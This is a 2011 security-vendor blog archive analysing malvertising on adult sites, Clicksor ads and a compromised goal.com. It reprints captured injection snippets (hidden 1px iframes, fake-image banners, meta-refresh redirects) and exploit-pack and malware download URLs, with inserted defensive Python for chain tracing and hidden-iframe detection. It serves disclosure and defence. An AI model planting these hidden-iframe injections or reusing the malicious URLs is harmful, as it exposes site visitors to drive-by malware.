Armorize Unofficial Chinese Blog (阿碼外傳): 05/01/2011 - 06/01/2011

May 31, 2011

Adult sites have enormous traffic... and malvertising

(Authors: Chris Hsiao, NightCola Lin, Wayne Huang)

If you walk into our office after hours and find a crowd gathered around Chris Hsiao's desk, with a large number of adult sites and images on the screen... believe us, we are working.

At Armorize we actively scan a large number of websites to determine whether they behave maliciously. We cannot cover every site, so we try at least to cover the larger ones. Once the platform was up, we noticed something right away: a sizeable share of those large, high-traffic sites are adult sites!

As we started scanning them, a pattern emerged immediately: besides heavy traffic, these sites are usually accompanied by malicious advertising (malvertising).

Malicious ads reach visitors through the website (called the publisher in the ad industry). Some of them come with drive-by download behaviour: the visitor is at risk of infection merely by having the ad displayed, without taking any action or clicking any confirmation button.

Below is our report on how one malicious advertiser (celeb-escorts.com) got two very large adult sites to display its malicious ads.

The first site is pornhub.com, Alexa rank 62, with 23,873,546 visitors per day.

That is a lot of traffic! The malicious ad was displayed on pornhub.com through an ad broker (the intermediary between the site and the advertiser, generally called an ad network / exchange): etology.com. The ad was supplied to etology by the advertiser celeb-escorts.com, a domain registered only on May 11 of this year (2011). Everything therefore suggests that celeb-escorts.com was most likely registered by a malicious group for the purpose of spreading its malicious ad across the whole ad network. The figure below shows the sites involved in this incident:

The next figure shows the main actor: the malicious ad itself, as served via celeb-escorts. While the ad is displayed, an iframe is generated that sends the visitor to tun4atta.in, the starting point of the whole malicious behaviour.

The complete infection chain, with details, is as follows:

1. http://www.pornhub.com/

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage

3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/

4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29

5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html

6. http://pages.etology.com/imp2/93114.php
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>

7. http://celeb-escorts.com/banners/300x250.jpg
<a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg'  border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>

8. http://tun4atta.in/bcounter.php?u=adult
<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

9. http://iban6duo.in/ts/in.cgi?adult
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(This is the malware that is finally downloaded and executed)
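The chain above can be reconstructed offline from captured responses rather than by re-visiting the sites. The following is an added example, not Armorize's or HackAlert's code: it walks a constructed capture built from the snippets quoted above (steps 7 to 10), sniffs each body by magic bytes so that a ".jpg" URL returning markup is flagged, and follows iframe, img and meta-refresh hops; the same function applies unchanged to the tube8 and Clicksor chains later on this page, which use the same bcounter.php / in.cgi / meta-refresh hops.

```python
import re
from urllib.parse import urljoin

# Constructed capture (URL -> response body), built from the snippets quoted in
# this post; a logging proxy or HackAlert-style recorder would hold the same data.
# The banner-300x250.jpeg entry is a genuine JPEG header, so the sniffing check
# can be seen passing on a real image.
CAPTURE = {
    "http://celeb-escorts.com/banners/300x250.jpg":
        b"<a href='http://celeb-escorts.com/' target='_parent'>"
        b"<img src='http://celeb-escorts.com/images/banner-300x250.jpeg' border=0></a>"
        b"<iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' "
        b"frameborder='0' scrolling='no'></iframe>",
    "http://celeb-escorts.com/images/banner-300x250.jpeg":
        b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16,
    "http://tun4atta.in/bcounter.php?u=adult":
        b"<iframe width='34' height='44' frameborder='0' scrolling='no' "
        b"src='http://iban6duo.in/ts/in.cgi?adult'></iframe>",
    "http://iban6duo.in/ts/in.cgi?adult":
        b"<html><head><meta http-equiv=\"REFRESH\" content=\"1; "
        b"URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'\">"
        b"</head><body>document moved <a href=\"http://finish.horseretirementhome.com/"
        b"index.php?tp=452874001a8808fb\">here</a></body></html>",
}

IMAGE_MAGIC = {b"\xff\xd8\xff": "jpeg", b"GIF87a": "gif", b"GIF89a": "gif",
               b"\x89PNG\r\n\x1a\n": "png"}
IMAGE_EXT = re.compile(r"\.(jpe?g|gif|png)(\?|$)", re.I)
# Automatic hops only: img and iframe are fetched by the browser on its own and a
# meta refresh navigates by itself.  <a href> needs a click, so anchors are not followed.
IMG_SRC = re.compile(r"<img\b[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
IFRAME_SRC = re.compile(r"<iframe\b[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
META_REFRESH = re.compile(
    r"<meta\b[^>]*http-equiv\s*=\s*['\"]?refresh['\"]?[^>]*"
    r"content\s*=\s*['\"]\s*\d+\s*;\s*url\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def sniff(body: bytes) -> str:
    """Classify a body by its leading bytes, never by the URL's extension."""
    for magic, kind in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return kind
    return "html" if body.lstrip().startswith(b"<") else "unknown"


def next_hops(url: str, body: bytes) -> list:
    """URLs this HTML hop makes the browser load without user interaction."""
    text = body.decode("latin-1")  # never raises; the URLs are ASCII anyway
    found = IMG_SRC.findall(text) + IFRAME_SRC.findall(text) + META_REFRESH.findall(text)
    return [urljoin(url, u) for u in found]


def walk_chain(start: str, capture: dict, max_depth: int = 10) -> list:
    """
    Walk the chain from `start` through the captured responses, depth first.
    Returns one (url, kind, flags) tuple per hop.  The flag
    'image-extension-serves-html' marks the trick this post describes (a .jpg
    URL returning markup).  A hop that was not captured, e.g. an exploit-pack
    landing page served only once per IP, is recorded as 'not-captured' and
    ends that branch instead of raising.
    """
    seen, chain, stack = set(), [], [(start, 0)]
    while stack:
        url, depth = stack.pop()
        if url in seen or depth > max_depth:
            continue
        seen.add(url)
        body = capture.get(url)
        if body is None:
            chain.append((url, "not-captured", []))
            continue
        kind = sniff(body)
        flags = ["image-extension-serves-html"] if kind == "html" and IMAGE_EXT.search(url) else []
        chain.append((url, kind, flags))
        if kind == "html":
            for hop in reversed(next_hops(url, body)):  # pop order == document order
                stack.append((hop, depth + 1))
    return chain


if __name__ == "__main__":
    for url, kind, flags in walk_chain("http://celeb-escorts.com/banners/300x250.jpg", CAPTURE):
        print(f"{kind:14} {url}  {' '.join(flags)}")
```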

The exploit pack used by the attackers in this case is Black Hole. Since we first observed it on May 13, the malware finally downloaded and installed has kept changing over time.

The malware first observed was SpyEye, a piece of crimeware similar to Zeus. Its detection rate on VirusTotal was initially only 3/42; it is now 21/42.

The malware currently being downloaded and installed is still SpyEye, but repacked, so its detection rate on VirusTotal is only 5/42.

The second site is tube8.com, Alexa rank 113, with 10,885,350 visitors per day.

The ad agency loaded first (Traffic Junky, trafficjunky.net) and the ad broker (etology.com) are the same. We indeed saw the very same malicious ad on tube8.com.

The figure below shows the sites involved in this incident:

The complete infection chain, with details, is as follows:

1. http://tube8.com

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage

3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html
<iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300

5. http://pages.etology.com/imp2/96244.php

6. http://celeb-escorts.com/banners/300x250.jpg

7. http://tun4atta.in/bcounter.php?u=adult
<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

8. http://iban6duo.in/ts/in.cgi?adult
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(This is the malware that is finally downloaded and executed)

Given the enormous traffic of these two sites (23,873,546 and 10,885,350 daily visitors respectively), and the fact that we have seen this malicious ad continuously since May 13, we believe a very large number of visitors have already been infected.


May 20, 2011

goal.com spreads malware again: the fake antivirus "Security Shield"

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

In our previous analysis of goal.com we wrote: "Based on the data we have collected, part of goal.com appears to have been compromised, allowing the attackers to control its page content. The compromised site may contain a backdoor that the attackers can use persistently to control it."

The malicious code used in the previous incident disappeared from goal.com shortly afterwards. However, HackAlert recently (2011/5/17) again detected the site distributing malware, which indicates that the attackers have indeed planted a backdoor there. This time they are using goal.com to spread the fake antivirus "Security Shield".

[Summary]

Trigger:
After the user visits Goal.com, the browser executes the malicious code injected into the site (pointing to 31d6f5art8.co.be). Without any social engineering and without the user clicking any particular link, a drive-by download begins and installs the fake antivirus "Security Shield" on the user's computer. Simply browsing a website is enough to be infected. "Security Shield" keeps issuing warnings and at the same time opens the browser to various adult sites; it stops this nuisance only after the user buys a "serial number". Rebooting does not stop it either, since the fake antivirus is installed on the computer and stays resident.

The malicious domain a78hl7zv4p.co.be serves its exploit code only once per IP address.

Right after this article was published, the attackers quickly shut down the two malicious domains mentioned above and immediately switched to a new pair: zfdim0u06t.co.be and 4t7uxaxrg8.co.be. While we were editing this blog post they switched again, to uzldzzzeo3.co.be and zepa6hr6jk.co.be.

Detection rates:
The malicious domains include 31d6f5art8.co.be, a78hl7zv4p.co.be, zfdim0u06t.co.be and 4t7uxaxrg8.co.be. Not one of them is blacklisted by any of the 18 blacklist providers on urlvoid.com.
goal.com itself is likewise not flagged by any provider on urlvoid.com (0/18).

The detection rate of the "Security Shield" malware itself on VirusTotal is 6/42.

Technique used:
Drive-by download; the attackers control the content of goal.com. (This case was not spread through malvertising.)

Below is the video we recorded of this incident, from first browsing goal.com to "Security Shield" running.

[Infection point]
The infected URL is [http://www.goal.com/en]; the injected code fragment is:
<div id="eplayer">
<style type="text/css">#adtfd {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style>
<iframe id="adtfd" src="http://31d6f5art8.co.be/ad.jpg"></iframe>
</div>

This code produces an iframe pointing to http://a78hl7zv4p.co.be/domains/buy, which is the URL that serves the exploit code.
Once the exploit runs successfully, the browser performs a drive-by download, fetching "Security Shield" from http://a78hl7zv4p.co.be/domains/bf02bde9910ff9be016eb48ac5a51043.php?thread_id=2&f=63444537&topic_id=buy&.

"Security Shield" installs itself, then immediately starts showing fake warnings and automatically opening the browser to adult sites:


[Detection rates]
The detection rate of the "Security Shield" malware itself on VirusTotal is 6/42.

goal.com itself is blacklisted on urlvoid.com at a rate of 0/18.


[Site traffic and ranking]
1. According to compete.com, goal.com averages 232,116 visitors per day.
2. According to checksitetraffic.com, it has 215,989 visitors per day.
3. goal.com's global rank on Alexa (alexa.com) is 379.


May 16, 2011

More than half of all malvertising comes from Clicksor

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)


Recently our HackAlert detected a large volume of malicious ads (malvertising), more than half of which came from one ad network: Clicksor.

Analysis:
Here we pick just one case to analyse. The complete capture log is available for download; the infection path is as follows:

1. Victim site:
http://mytingoo.com/
2. The embedded Clicksor ad link:
<script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script>
3. The fragment of content that loads the ad:
<script type="text/javascript" src="http://pub.clicksor.net/newServing/js/banner.js"></script></head><body><div id="tip"><span>Tooltips</span></div><div id="ad_block"><ul><li><ol><li class="rich" style="width:728px;height:90px;" id="ad0" ><iframe src=http://anexsecurity.com/pub_ben/728x90.jpg width='728' height='90' frameborder='0' scrolling='no' marginheight=0 marginwidth=0></iframe><img border="0" width="1" height="1" alt="roi px" src="http://serw.clicksor.com/newServing/roitrack.php?cluid=1092-1-186469-30-94296-57-1304418113354-1304418118-1034384353-281945&nid=1&type=Other&value=-1&adsid=51" /></li></ol></li></ul></div><!-- generated in 0.017482995986938s. --></body></html>
4. Here http://anexsecurity.com/pub_ben/728x90.jpg is the injected malicious ad. It is disguised as an image file but is actually HTML: it loads a genuine jpg and at the same time creates an iframe leading to the malicious redirect link. Its content is:

<a href='http://anexsecurity.com/' target='_parent'><img src='http://anexsecurity.com/banners/728x90.jpg'  border=0></a><iframe src='http://yobi3sol.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe>
5. Next, http://yobi3sol.in/bcounter.php?u=ben performs two redirects; its content is:
<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?ben'></iframe>
6. The content of http://iban6duo.in/ts/in.cgi?ben is:
<html><head><meta http-equiv="REFRESH" content="1; URL='http://set.obamawebsites.com/news/1992'"></head><body>document moved <a href="http://set.obamawebsites.com/news/1992">here</a></body></html>
7. Finally it redirects to the malicious exploit-pack link http://set.obamawebsites.com/news/1992 (which generates an exploit matching the visitor's browser version and environment). Its content is obfuscated JavaScript padded with random dictionary words.
8. Link to the malware (exe file) downloaded after the exploit succeeds:
http://set.obamawebsites.com/news/ef32a1cbd16cb1530384e609aa89f346.php?thread_id=2&f=4315508&topic_id=1992&

Characteristics:

a. Hard to detect:
b. Long-lived: more than three months
c. Wide impact: more than 20,000 sites affected at the same time


Because the ad slot loads different ads by region, the ad seen in each region may differ, and ads are loaded in rotation, so the malicious one is not loaded on every request. This property also makes detection harder.

Here we randomly list 20 sites on which HackAlert detected malicious Clicksor ads, giving for each the affected site URL, the embedded Clicksor ad link, the malware download link and the Google Safe Browsing report.


Of these 20 sites, only 2 (about 10%) are flagged as malicious by Google Safe Browsing; the rest are not listed as suspicious at all, which shows how hard detection is.

In fact, HackAlert detected a similar case as early as 1/25 this year, most likely the work of the same actor: a different ad image, but almost exactly the same technique. Normally such malicious links do well to survive one or two weeks. This one, counting from 1/25, has been running for over three months and is still active today.

The infection path at that time was:

1. http://ultimate-board.com/ (affected site)

2. http://ads.clicksor.com/showAd.php?nid=1&pid=161822&adtype=2&sid=246482 (the malicious ad below is not necessarily loaded every time)

3. http://personnelagency.org/pub_ben/728x90.jpg (disguised as an image file; actually HTML with the following content)

<a href="http://personnelagency.org/" target="_parent"><img src="http://personnelagency.org/banners/768x90.gif" border=0></a><iframe src='http://2trotlug.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe>
4. http://2trotlug.in/bcounter.php?u=ben
<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://goodpersonnecounter.com/ts/in.cgi?ben'></iframe>
5. Exploit URL:
http://goodpersonnecounter.com/ts/in.cgi?ben
6. Dropped Binary:
http://194.247.58.50/dlf.php?i=15

Furthermore, by our statistics over the Alexa top one million sites, Clicksor customers account for over 2%, meaning more than 20,000 sites are affected at the same time; anyone who has browsed a site carrying Clicksor ads may have been infected.


May 10, 2011

Well-known football site goal.com spreads malware

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

1. According to compete.com, goal.com averages 232,116 visitors per day
2. According to checksitetraffic.com, it has 215,989 visitors per day
3. goal.com's global rank on Alexa (alexa.com) is 379

HackAlert recently detected drive-by download behaviour during 4/27~4/28. Based on our observations, we believe the attackers have access inside goal.com's systems and were testing the effectiveness of their attack only during 4/27~4/28.
Our technical report follows:

[Summary]

A. Based on the data we have collected, part of goal.com appears to have been compromised, allowing the attackers to control its page content. The compromised site may contain a backdoor that the attackers can use persistently to control it.

B. We do not believe this was a one-off mass SQL injection attack, because the malicious domains involved have not appeared on any other compromised site.

C. The malicious domains include:
1. pxcz.cz.cc (not blacklisted by any antivirus vendor or Google Safe Browsing)
2. opofy7puti.cz.cc (not blacklisted by any antivirus vendor or Google Safe Browsing)
3. justatest.cz.cc (not blacklisted by any antivirus vendor or Google Safe Browsing)

These clues indicate a targeted attack against goal.com.

D. Distribution lasted from 4/27 to 4/28; the attackers seem to have used this window to test the attack's effectiveness, and our scanner caught it during that window.

E. The exploit code we sampled targets the following vulnerabilities: CVE-2010-1423 (Java), CVE-2010-1885 (MS Help Center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC).

F. The exploit pack is g01pack. Unlike typical exploit packs it includes a fake admin page; through this fake "honeynet" the attackers can watch who is investigating further.

G. The exploit code is heavily "transformed". We avoid the word "obfuscated" here because, beyond obfuscation, the exploit uses techniques unlike earlier ones to evade detection.

H. The malware itself is packed with UPX and modifies setupapi.dll and sfcfiles.dat on the system. When we first submitted it to VirusTotal, only four antivirus vendors (4 / 41) flagged it as malicious.

I. The malware connects to the following domains:

1. testurl.ipq.co:80 (UK) (not blacklisted by any antivirus vendor or Google Safe Browsing)
2. 74.125.47.99:80 (US), which reverse-resolves to coldgold.co.uk (not blacklisted by any antivirus vendor or Google Safe Browsing)
3. banderlog.org (not blacklisted by any antivirus vendor or Google Safe Browsing, but listed on clean-mx.de)

[Details]

The infection capture we recorded can be downloaded here. It contains the HTTP traffic generated while browsing with a browser, from first visiting the site until the malware itself is downloaded through the browser.

The complete infection chain is:
1. goal.com contains an iframe pointing to pxcz.cz.cc
2. pxcz.cz.cc contains an iframe pointing to justatest.cz.cc
3. justatest.cz.cc contains the exploit code (g01pack exploit pack), which serves different exploits depending on the user's browser
4. The exploit runs successfully and downloads the malware from justatest.cz.cc
5. The malware connects to testurl.ipq.co (UK), 74.125.47.99:80 (US, coldgold.co.uk) and banderlog.org
The chain starts at http://www.goal.com/en/:
<p>Arjen Robben has admitted that his future lies with the German and European giants, hinting that he could even remain there for the rest of his career <style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p>

The attacker appended an iframe pointing to pxcz.cz.cc after the HTML above. pxcz.cz.cc contains another iframe pointing to justatest.cz.cc, which in turn hosts both the exploit code (g01pack) and the malware itself. What is unusual about this g01pack is that it also includes fake admin pages. These accept some common username/password pairs (such as Admin / Admin) to make analysts believe they have successfully gained access to the g01pack management panel.

Once logged in, the analyst is shown fabricated statistics, while the attackers use the same event to learn who is trying to analyse the malicious domain.
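A scanner can flag this injection pattern (an iframe made invisible through a `#id` style rule, as in the `#yxvim` snippet above and the `#adtfd` snippet in the May 20 post) without executing any page script. The following is an added example, not Armorize's or HackAlert's code; the sample pages are constructed from the two injected fragments quoted on this page plus one benign embed, and the detector also covers inline `style` and width/height attributes, which the posts do not show.

```python
import re

STYLE_BLOCK = re.compile(r"<style\b[^>]*>(.*?)</style>", re.I | re.S)
CSS_ID_RULE = re.compile(r"#([\w-]+)\s*\{([^}]*)\}")
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"([\w-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")

# Constructed from the injected fragment quoted above (http://www.goal.com/en/).
GOAL_MAY10 = (
    "<p>Arjen Robben has admitted that his future lies with the German and European giants "
    '<style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}'
    '</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p>'
)
# Constructed from the fragment quoted in the May 20 post: new id, same pattern.
GOAL_MAY20 = (
    '<div id="eplayer"><style type="text/css">#adtfd {width: 1px;height: 1px;frameborder: no;'
    'visibility: hidden;}</style><iframe id="adtfd" src="http://31d6f5art8.co.be/ad.jpg"></iframe></div>'
)
# Constructed benign embed: normal size, no hiding rule, must not be flagged.
BENIGN = '<iframe id="player" src="https://example.com/embed/123" width="640" height="360"></iframe>'


def parse_attrs(tag_body: str) -> dict:
    """Attributes of one tag as {name: value}; handles "..", '..' and bare values."""
    attrs = {}
    for m in ATTR.finditer(tag_body):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def id_rules(html: str) -> dict:
    """Declarations of every `#id { ... }` rule found in inline <style> blocks."""
    rules = {}
    for block in STYLE_BLOCK.findall(html):
        for ident, decl in CSS_ID_RULE.findall(block):
            rules[ident] = rules.get(ident, "") + decl.lower() + ";"
    return rules


def _tiny(value) -> bool:
    """True for a width/height of at most 2px ('1px', '1', '0'); None is not tiny."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value or "")
    return m is not None and int(m.group(1)) <= 2


def hidden_iframes(html: str) -> list:
    """
    (src, reasons) for every iframe the visitor cannot see.  The #id rule from
    <style>, the inline style attribute and the width/height attributes are all
    considered, because injected code can use any of them to hide the frame.
    """
    rules = id_rules(html)
    findings = []
    for m in IFRAME_TAG.finditer(html):
        attrs = parse_attrs(m.group(1))
        decl = (rules.get(attrs.get("id", ""), "") + attrs.get("style", "").lower()).replace(" ", "")
        reasons = [r for r in ("visibility:hidden", "display:none") if r in decl]
        width = re.search(r"(?<![\w-])width:([^;]*)", decl)
        height = re.search(r"(?<![\w-])height:([^;]*)", decl)
        w = width.group(1) if width else attrs.get("width")
        h = height.group(1) if height else attrs.get("height")
        if _tiny(w) or _tiny(h):
            reasons.append("1px-box")
        if reasons:
            findings.append((attrs.get("src", ""), reasons))
    return findings


if __name__ == "__main__":
    for name, page in (("May 10", GOAL_MAY10), ("May 20", GOAL_MAY20), ("benign", BENIGN)):
        print(name, hidden_iframes(page))
```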

The exploit code in this incident is heavily "transformed"; unlike earlier obfuscation techniques, it prevents analysts from recognising it as exploit code at a glance. The exploit pack contains many exploits; here we show only the one for CVE-2006-0003 (MS MDAC). This exploit code can be obtained here.
